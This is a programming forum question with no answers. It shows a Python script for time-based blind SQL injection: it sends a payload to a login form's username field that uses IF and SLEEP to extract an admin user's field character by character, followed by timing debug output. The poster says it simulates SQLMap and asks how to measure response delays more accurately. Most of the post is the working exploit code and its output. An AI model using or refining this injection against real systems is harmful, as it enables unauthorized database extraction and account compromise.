Shinomoto Asakura
Reputation: 1542
How to be more precise calculation elapsed time using python request?
I'm trying to simulate a SQLMap exploting a SQL injection Time Based.
resultado = ""
listaCaracteres = string.ascii_letters + string.digits + "._-@/"
delay = 5
tamanhoCampo = 30
for i in range(1,tamanhoCampo+1):
caracterFound = False
for char in listaCaracters:
data = {
"username": f"teste' OR IF((SELECT substring(avatar,{i},1) FROM users WHERE username='admin')='{caracter}',SLEEP({delay}),1)#",
"password": "teste"
}
startTime = time.time()
try:
# print(f"[+] Iniciando Requisição - posição {i} caracter {caracter}")
resp = requests.post(url, headers=headers, cookies=cookies, data=data)
except Exceptions as e:
print(e)
endTime = time.time()
tempoTotal = endTime - startTime
print(f"[*] Pos. {i} {caracter} {tempoTotal}")
if tempoTotal >= delay:
print(f"[+] Caracter encontrado {caracter} {tempoTotal}")
resultado += caracter
caracterEncontrado = True
delay = 5
break
if not caracterEncontrado:
delay += 1
print(f"[*] Caracter não encontrado, aumentando o tempo de resposta para {delay} segundos")
print(resultado)
Debugging the results
[*] Iniciando o DUMP.
[*] Pos. 1 a 0.41757917404174805
[*] Pos. 1 b 0.42841196060180664
[*] Pos. 1 c 0.42807817459106445
[*] Pos. 1 d 1.420304536819458
[*] Pos. 1 e 0.4183344841003418
[*] Pos. 1 f 0.4205491542816162
[*] Pos. 1 g 0.41797685623168945
[*] Pos. 1 h 0.41671323776245117
[*] Pos. 1 i 0.41751718521118164
[*] Pos. 1 j 0.4145169258117676
[*] Pos. 1 k 0.4157712459564209
[*] Pos. 1 l 0.4163017272949219
[*] Pos. 1 m 0.41348886489868164
[*] Pos. 1 n 0.4273350238800049
[*] Pos. 1 o 0.42464113235473633
[*] Pos. 1 p 0.4265732765197754
[*] Pos. 1 q 0.4321424961090088
[*] Pos. 1 r 0.4281890392303467
[*] Pos. 1 s 0.41872739791870117
[*] Pos. 1 t 0.41807007789611816
[*] Pos. 1 u 4.920653581619263
[*] Pos. 1 v 0.41268229484558105
[*] Pos. 1 w 0.47426342964172363
[*] Pos. 1 x 0.4102909564971924
[*] Pos. 1 y 0.41750526428222656
[*] Pos. 1 z 0.41268014907836914
[*] Pos. 1 A 0.412386417388916
[*] Pos. 1 B 0.4086577892303467
[*] Pos. 1 C 0.41196632385253906
Pos.1 letter u gives almost 5 seconds, actually 4.9 that's exatcly the first character in avatar field what I'm looking for, each script executation give me 4.9 or more than 5 secs, sometimes this goes into the first condition and not!
So, how to be more accurate calculate this?
Upvotes: 0
Views: 57
Answers (0)
Related Questions
- How to upgrade all Python packages with pip
- How slicing in Python works
- How can I remove a key from a Python dictionary?
- How do I merge two dictionaries in a single expression in Python?
- How are parameters sent in an HTTP POST request?
- How can I delete a file or folder in Python?
- How do I get the current time in Python?
- How can I access environment variables in Python?
- How do I concatenate two lists in Python?
- How do I measure elapsed time in Python?